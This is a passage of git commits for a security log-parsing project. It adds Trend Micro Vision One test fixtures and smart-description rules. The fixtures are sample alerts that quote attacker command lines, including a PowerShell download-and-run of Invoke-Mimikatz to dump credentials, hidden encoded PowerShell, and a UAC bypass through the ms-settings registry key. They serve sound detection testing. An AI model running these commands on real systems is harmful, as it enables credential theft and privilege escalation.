[\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"text\", \"field\": \"endpointHostName\", \"value\": \"Nimda\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}]}" + }, + "expected": { + "message": "{\"schemaVersion\": \"1.12\", \"id\": \"WB-9002-20220906-00023\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://THE_WORKBENCH_URL\", \"alertProvider\": \"SAE\", \"modelId\": \"1ebd4f91-4b28-40b4-87f5-8defee4791d8\", \"model\": \"Credential Dumping via Mimikatz\", \"modelType\": \"preset\", \"score\": 64, \"severity\": \"high\", \"createdDateTime\": \"2022-09-06T02:49:30Z\", \"updatedDateTime\": \"2022-09-06T02:49:50Z\", \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"shockwave\\\\sam\", \"entityId\": \"shockwave\\\\sam\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"name\": \"nimda\", \"ips\": [\"10.10.58.51\"]}, \"entityId\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"managementScopeGroupId\": \"deadbeef-292e-42ae-86be-d2fef483a248\", \"managementScopeInstanceId\": \"1babc299-52de-44f4-a1d2-8a224f391eee\", 
\"managementScopePartitionKey\": \"4c1850c0-8a2a-4637-9f88-6afbab54dd79\", \"relatedEntities\": [\"shockwave\\\\sam\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7], \"provenance\": [\"Alert\"]}]}, \"description\": \"A user obtained account logon information that can be used to access remote systems via Mimikatz.\", \"matchedRules\": [{\"id\": \"1288958d-3062-4a75-91fc-51b2a49bc7d7\", \"name\": \"Potential Credential Dumping via Mimikatz\", \"matchedFilters\": [{\"id\": \"49d327c4-361f-43f0-b66c-cab433495e42\", \"name\": \"Possible Credential Dumping via Mimikatz\", \"matchedDateTime\": \"2022-09-05T03:53:57.199Z\", \"mitreTechniqueIds\": [\"V9.T1003.001\", \"V9.T1059.003\", \"V9.T1212\"], \"matchedEvents\": [{\"uuid\": \"e168a6e5-27b1-462b-ad3e-5146df4e6aa5\", \"matchedDateTime\": \"2022-09-05T03:53:57.199Z\", \"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe \\\"iex (new-object net.webclient).downloadstring(\\\" \\\"https://raw.githubusercontent.com/mattifestation/powersploit/master/exfiltration/invoke-mimikatz.ps1); invoke-mimikatz -dumpcreds\\\"\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe -nop -noni -w hidden -enc ......aakaakaekavgaracqaswapackafabjaeuawaa=\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe -nop -noni -w hidden -c $x=$((gp hkcu:software\\\\microsoft\\\\windows 
update).update); powershell -nop -noni -w hidden -enc $x\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"file_sha1\", \"field\": \"objectFileHashSha1\", \"value\": \"1B3B40FBC889FD4C645CC12C85D0805AC36BA254\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"fullpath\", \"field\": \"objectFilePath\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"text\", \"field\": \"endpointHostName\", \"value\": \"Nimda\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}]}", + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "type": [ + "info" + ] + }, + "@timestamp": "2022-09-06T02:49:30Z", + "file": { + "directory": "c:\\windows\\system32\\windowspowershell\\v1.0", + "hash": { + "sha1": "1B3B40FBC889FD4C645CC12C85D0805AC36BA254" + }, + "name": "powershell.exe", + "path": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe" + }, + "host": { + "ip": [ + "10.10.58.51" + ], + "name": "nimda" + }, + "observer": { + "product": "Vision One", + "vendor": "TrendMicro" + }, + "organization": { + "id": "shockwave\\sam", + "name": "shockwave\\sam" + }, + "process": { + 
"command_line": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe -nop -noni -w hidden -enc ......aakaakaekavgaracqaswapackafabjaeuawaa=", + "executable": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", + "parent": { + "command_line": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe -nop -noni -w hidden -c $x=$((gp hkcu:software\\microsoft\\windows update).update); powershell -nop -noni -w hidden -enc $x" + } + }, + "related": { + "hash": [ + "1B3B40FBC889FD4C645CC12C85D0805AC36BA254" + ], + "ip": [ + "10.10.58.51" + ] + }, + "rule": { + "name": "Credential Dumping via Mimikatz" + }, + "trendmicro": { + "vision_one": { + "alert_id": "WB-9002-20220906-00023", + "investigation_status": "New", + "severity": "high", + "status": "Open" + } + } + } +} \ No newline at end of file diff --git a/Trend Micro/trend-micro-vision-one/tests/test_registry.json b/Trend Micro/trend-micro-vision-one/tests/test_registry.json new file mode 100644 index 000000000..093876a30 --- /dev/null +++ b/Trend Micro/trend-micro-vision-one/tests/test_registry.json 
@@ -0,0 +1,72 @@ +{ + "input": { + "message": "{\"schemaVersion\": \"1.12\", \"id\": \"WB-9002-20220906-00022\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://THE_WORKBENCH_URL\", \"alertProvider\": \"SAE\", \"modelId\": \"1ebd4f91-4b28-40b4-87f5-8defee4791d8\", \"model\": \"Privilege Escalation via UAC Bypass\", \"modelType\": \"preset\", \"score\": 64, \"severity\": \"high\", \"firstInvestigatedDateTime\": \"2022-10-06T02:30:31Z\", \"createdDateTime\": \"2022-09-06T02:49:31Z\", \"updatedDateTime\": \"2022-09-06T02:49:48Z\", \"incidentId\": \"IC-1-20230706-00001\", \"caseId\": \"CL-1-20230706-00001\", \"ownerIds\": [\"12345678-1234-1234-1234-123456789012\"], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 1, \"containerCount\": 1, \"cloudIdentityCount\": 1, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"shockwave\\\\sam\", \"entityId\": \"shockwave\\\\sam\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"name\": \"nimda\", \"ips\": [\"10.10.58.51\"]}, \"entityId\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"managementScopeGroupId\": \"deadbeef-292e-42ae-86be-d2fef483a248\", \"managementScopeInstanceId\": \"1babc299-52de-44f4-a1d2-8a224f391eee\", \"managementScopePartitionKey\": \"4c1850c0-8a2a-4637-9f88-6afbab54dd79\", \"relatedEntities\": [\"shockwave\\\\sam\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8], \"provenance\": [\"Alert\"]}, {\"entityType\": \"emailAddress\", \"entityValue\": \"support@pctutordetroit.com\", \"entityId\": \"SUPPORT@PCTUTORDETROIT.COM\", \"relatedEntities\": [], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"container\", \"entityValue\": 
\"k8s_democon_longrunl_default_09451f51-7124-4aa5-a5c4-ada24efe9da9_0\", \"entityId\": \"7d1e00176d78b2b1db0744a187314bf2ce39f3a7d43137c366ae6785e8a4f496\", \"relatedEntities\": [], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"cloudIdentity\", \"entityValue\": \"arn:aws:sts::985266316733:assumed-role/aad-admin/steven_hung\", \"entityId\": \"arn:aws:sts::985266316733:assumed-role/aad-admin/steven_hung\", \"relatedEntities\": [], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}]}, \"description\": \"A user bypassed User Account Control (UAC) to gain higher-level permissions.\", \"matchedRules\": [{\"id\": \"25d96e5d-cb69-4935-ae27-43cc0cdca1cc\", \"name\": \"(T1088) Bypass UAC via shell open registry\", \"matchedFilters\": [{\"id\": \"ac200e74-8309-463e-ad6b-a4c16a3a377f\", \"name\": \"Bypass UAC Via Shell Open Default Registry\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"mitreTechniqueIds\": [\"T1112\", \"V9.T1112\", \"V9.T1548.002\"], \"matchedEvents\": [{\"uuid\": \"a32599b7-c0c9-45ed-97bf-f2be7679fb00\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"type\": \"TELEMETRY_REGISTRY\"}]}, {\"id\": \"857b6396-da29-44a8-bc11-25298e646795\", \"name\": \"Bypass UAC Via Shell Open Registry\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"mitreTechniqueIds\": [\"T1112\", \"T1088\", \"V9.T1112\", \"V9.T1548.002\"], \"matchedEvents\": [{\"uuid\": \"4c456bbb-2dfc-40a5-b298-799a0ccefc01\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"type\": \"TELEMETRY_REGISTRY\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\rundll32.exe c:\\\\users\\\\sam\\\\appdata\\\\local\\\\cyzfc.dat entrypoint\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": 
\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\" -noni -win hidden -Ep ByPass $r = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('....XggJHNjQjs=')); iex $r; \", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\rundll32.exe c:\\\\users\\\\sam\\\\appdata\\\\local\\\\cyzfc.dat entrypoint\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\" -noni -win hidden -Ep ByPass $r = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('....jY0KTtpZXggJHNjQjs=')); iex $r; \", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"registry_key\", \"field\": \"objectRegistryKeyHandle\", \"value\": \"hkcr\\\\ms-settings\\\\shell\\\\open\\\\command\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"registry_key\", \"field\": \"objectRegistryKeyHandle\", \"value\": \"hkcr\\\\ms-settings\\\\shell\\\\open\\\\command\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"registry_value\", \"field\": \"objectRegistryValue\", \"value\": \"delegateexecute\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": 
[\"Alert\"]}, {\"id\": 8, \"type\": \"registry_value_data\", \"field\": \"objectRegistryData\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe -NoP -NonI -W Hidden -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update); powershell -NoP -NonI -W Hidden -enc $x\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}]}" + }, + "expected": { + "message": "{\"schemaVersion\": \"1.12\", \"id\": \"WB-9002-20220906-00022\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://THE_WORKBENCH_URL\", \"alertProvider\": \"SAE\", \"modelId\": \"1ebd4f91-4b28-40b4-87f5-8defee4791d8\", \"model\": \"Privilege Escalation via UAC Bypass\", \"modelType\": \"preset\", \"score\": 64, \"severity\": \"high\", \"firstInvestigatedDateTime\": \"2022-10-06T02:30:31Z\", \"createdDateTime\": \"2022-09-06T02:49:31Z\", \"updatedDateTime\": \"2022-09-06T02:49:48Z\", \"incidentId\": \"IC-1-20230706-00001\", \"caseId\": \"CL-1-20230706-00001\", \"ownerIds\": [\"12345678-1234-1234-1234-123456789012\"], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 1, \"containerCount\": 1, \"cloudIdentityCount\": 1, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"shockwave\\\\sam\", \"entityId\": \"shockwave\\\\sam\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"name\": \"nimda\", \"ips\": [\"10.10.58.51\"]}, \"entityId\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"managementScopeGroupId\": \"deadbeef-292e-42ae-86be-d2fef483a248\", \"managementScopeInstanceId\": \"1babc299-52de-44f4-a1d2-8a224f391eee\", \"managementScopePartitionKey\": 
\"4c1850c0-8a2a-4637-9f88-6afbab54dd79\", \"relatedEntities\": [\"shockwave\\\\sam\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8], \"provenance\": [\"Alert\"]}, {\"entityType\": \"emailAddress\", \"entityValue\": \"support@pctutordetroit.com\", \"entityId\": \"SUPPORT@PCTUTORDETROIT.COM\", \"relatedEntities\": [], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"container\", \"entityValue\": \"k8s_democon_longrunl_default_09451f51-7124-4aa5-a5c4-ada24efe9da9_0\", \"entityId\": \"7d1e00176d78b2b1db0744a187314bf2ce39f3a7d43137c366ae6785e8a4f496\", \"relatedEntities\": [], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"cloudIdentity\", \"entityValue\": \"arn:aws:sts::985266316733:assumed-role/aad-admin/steven_hung\", \"entityId\": \"arn:aws:sts::985266316733:assumed-role/aad-admin/steven_hung\", \"relatedEntities\": [], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}]}, \"description\": \"A user bypassed User Account Control (UAC) to gain higher-level permissions.\", \"matchedRules\": [{\"id\": \"25d96e5d-cb69-4935-ae27-43cc0cdca1cc\", \"name\": \"(T1088) Bypass UAC via shell open registry\", \"matchedFilters\": [{\"id\": \"ac200e74-8309-463e-ad6b-a4c16a3a377f\", \"name\": \"Bypass UAC Via Shell Open Default Registry\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"mitreTechniqueIds\": [\"T1112\", \"V9.T1112\", \"V9.T1548.002\"], \"matchedEvents\": [{\"uuid\": \"a32599b7-c0c9-45ed-97bf-f2be7679fb00\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"type\": \"TELEMETRY_REGISTRY\"}]}, {\"id\": \"857b6396-da29-44a8-bc11-25298e646795\", \"name\": \"Bypass UAC Via Shell Open Registry\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"mitreTechniqueIds\": [\"T1112\", \"T1088\", \"V9.T1112\", \"V9.T1548.002\"], \"matchedEvents\": [{\"uuid\": \"4c456bbb-2dfc-40a5-b298-799a0ccefc01\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"type\": \"TELEMETRY_REGISTRY\"}]}]}], 
\"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\rundll32.exe c:\\\\users\\\\sam\\\\appdata\\\\local\\\\cyzfc.dat entrypoint\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\" -noni -win hidden -Ep ByPass $r = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('....XggJHNjQjs=')); iex $r; \", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\rundll32.exe c:\\\\users\\\\sam\\\\appdata\\\\local\\\\cyzfc.dat entrypoint\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\" -noni -win hidden -Ep ByPass $r = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('....jY0KTtpZXggJHNjQjs=')); iex $r; \", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"registry_key\", \"field\": \"objectRegistryKeyHandle\", \"value\": \"hkcr\\\\ms-settings\\\\shell\\\\open\\\\command\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"registry_key\", \"field\": \"objectRegistryKeyHandle\", \"value\": 
\"hkcr\\\\ms-settings\\\\shell\\\\open\\\\command\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"registry_value\", \"field\": \"objectRegistryValue\", \"value\": \"delegateexecute\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"registry_value_data\", \"field\": \"objectRegistryData\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe -NoP -NonI -W Hidden -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update); powershell -NoP -NonI -W Hidden -enc $x\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}]}", + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "type": [ + "info" + ] + }, + "@timestamp": "2022-09-06T02:49:31Z", + "container": { + "id": "7d1e00176d78b2b1db0744a187314bf2ce39f3a7d43137c366ae6785e8a4f496", + "name": "k8s_democon_longrunl_default_09451f51-7124-4aa5-a5c4-ada24efe9da9_0" + }, + "host": { + "ip": [ + "10.10.58.51" + ], + "name": "nimda" + }, + "observer": { + "product": "Vision One", + "vendor": "TrendMicro" + }, + "organization": { + "id": "shockwave\\sam", + "name": "shockwave\\sam" + }, + "process": { + "command_line": "c:\\windows\\system32\\rundll32.exe c:\\users\\sam\\appdata\\local\\cyzfc.dat entrypoint", + "parent": { + "command_line": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -noni -win hidden -Ep ByPass $r = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('....XggJHNjQjs=')); iex $r; " + } + }, + "registry": { + "data": { + "strings": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -NonI -W Hidden -c $x=$((gp HKCU:Software\\Microsoft\\Windows 
Update).Update); powershell -NoP -NonI -W Hidden -enc $x" + }, + "hive": "hkcr", + "key": "ms-settings\\shell\\open\\command", + "path": "hkcr\\ms-settings\\shell\\open\\command\\hkcr\\ms-settings\\shell\\open\\command\\delegateexecute", + "value": "delegateexecute" + }, + "related": { + "ip": [ + "10.10.58.51" + ] + }, + "rule": { + "name": "Privilege Escalation via UAC Bypass" + }, + "trendmicro": { + "vision_one": { + "alert_id": "WB-9002-20220906-00022", + "case_id": "CL-1-20230706-00001", + "incident_id": "IC-1-20230706-00001", + "investigation_status": "New", + "severity": "high", + "status": "Open" + } + }, + "user": { + "email": "support@pctutordetroit.com" + } + } +} \ No newline at end of file From f316fac6627ec461e64f6d3fa367286cf088a1ad Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Tue, 19 Nov 2024 09:52:34 +0200 Subject: [PATCH 248/317] Add smart descriptions --- .../trend-micro-vision-one/_meta/smart-descriptions.json | 6 ++++++ Trend Micro/trend-micro-vision-one/ingest/parser.yml | 2 ++ Trend Micro/trend-micro-vision-one/tests/test_process.json | 1 + Trend Micro/trend-micro-vision-one/tests/test_registry.json | 1 + 4 files changed, 10 insertions(+) diff --git a/Trend Micro/trend-micro-vision-one/_meta/smart-descriptions.json b/Trend Micro/trend-micro-vision-one/_meta/smart-descriptions.json index e69de29bb..7a3ee9d51 100644 --- a/Trend Micro/trend-micro-vision-one/_meta/smart-descriptions.json +++ b/Trend Micro/trend-micro-vision-one/_meta/smart-descriptions.json @@ -0,0 +1,6 @@ +[ + { + "value": "{event.reason}", + "conditions": [{ "field": "event.reason" }] + } +] diff --git a/Trend Micro/trend-micro-vision-one/ingest/parser.yml b/Trend Micro/trend-micro-vision-one/ingest/parser.yml index 38a31dd29..be400399d 100644 --- a/Trend Micro/trend-micro-vision-one/ingest/parser.yml +++ b/Trend Micro/trend-micro-vision-one/ingest/parser.yml 
@@ -20,6 +20,8 @@ stages: observer.vendor: "TrendMicro" observer.product: "Vision One" + event.reason: "{{parsed_event.message.model}}" + - set: "@timestamp": "{{parsed_event.message.createdDateTime}}" diff --git a/Trend Micro/trend-micro-vision-one/tests/test_process.json b/Trend Micro/trend-micro-vision-one/tests/test_process.json index 5eca6b2ea..d6ef4acd1 100644 --- a/Trend Micro/trend-micro-vision-one/tests/test_process.json +++ b/Trend Micro/trend-micro-vision-one/tests/test_process.json @@ -9,6 +9,7 @@ "intrusion_detection" ], "kind": "alert", + "reason": "Credential Dumping via Mimikatz", "type": [ "info" ] diff --git a/Trend Micro/trend-micro-vision-one/tests/test_registry.json b/Trend Micro/trend-micro-vision-one/tests/test_registry.json index 093876a30..f9873edf1 100644 --- a/Trend Micro/trend-micro-vision-one/tests/test_registry.json +++ b/Trend Micro/trend-micro-vision-one/tests/test_registry.json @@ -9,6 +9,7 @@ "intrusion_detection" ], "kind": "alert", + "reason": "Privilege Escalation via UAC Bypass", "type": [ "info" ] From 4b2aab06f6f6c739acc1bc9f1557ccc496ed6edc Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Tue, 19 Nov 2024 09:54:57 +0200 Subject: [PATCH 249/317] Add automation UUIDs --- Trend Micro/trend-micro-vision-one/_meta/manifest.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/Trend Micro/trend-micro-vision-one/_meta/manifest.yml b/Trend Micro/trend-micro-vision-one/_meta/manifest.yml index c0121a28d..8363b7b96 100644 --- a/Trend Micro/trend-micro-vision-one/_meta/manifest.yml +++ b/Trend Micro/trend-micro-vision-one/_meta/manifest.yml @@ -1,4 +1,6 @@ uuid: 9844ea0a-de7f-45d4-9a9b-b07651f0630e +automation_connector_uuid: 7aa5dd7c-d694-44dd-b605-66b7974dfb05 +automation_module_uuid: 1b02d442-b804-4987-afe7-6a4be6ef35e6 name: Trend Micro Vision One slug: trend-micro-vision-one From fbbe4c415d5ff8c2fd61103b32f54b68711e66a7 Mon Sep 17 00:00:00 2001 
From: LenaigKaliou Date: Tue, 19 Nov 2024 09:44:23 +0100 Subject: [PATCH 250/317] small fixes on conditions --- .../winlogbeat/_meta/smart-descriptions.json | 108 +++++++++++++++++- 1 file changed, 105 insertions(+), 3 deletions(-) diff --git a/Beats/winlogbeat/_meta/smart-descriptions.json b/Beats/winlogbeat/_meta/smart-descriptions.json index b720b4ffb..d3979925e 100644 --- a/Beats/winlogbeat/_meta/smart-descriptions.json +++ b/Beats/winlogbeat/_meta/smart-descriptions.json @@ -205,6 +205,35 @@ } ] }, + { + "value": "{action.properties.SubjectDomainName}\\{action.properties.SubjectUserName} logged on to {host.name} with special privileges", + "relationships": [ + { + "source": "user.name", + "target": "host.name", + "type": "logged on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4672 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.properties.SubjectDomainName" + }, + { + "field": "action.properties.SubjectuserName" + }, + { + "field": "host.name" + } + ] + }, { "value": "{user.domain}\\{user.name} logged on to {host.name} with special privileges", "relationships": [ @@ -222,6 +251,15 @@ { "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "user.domain" + }, + { + "field": "user.name" + }, + { + "field": "host.name" } ] }, @@ -726,7 +764,7 @@ "value": "Microsoft-Windows-Security-Auditing" }, { - "field":"host.hostname" + "field": "host.hostname" } ] }, @@ -802,7 +840,7 @@ "value": "Microsoft-Windows-Security-Auditing" }, { - "field":"host.hostname" + "field": "host.hostname" } ] }, @@ -853,7 +891,7 @@ "field": "source.ip" }, { - "field":"host.hostname" + "field": "host.hostname" } ] }, 
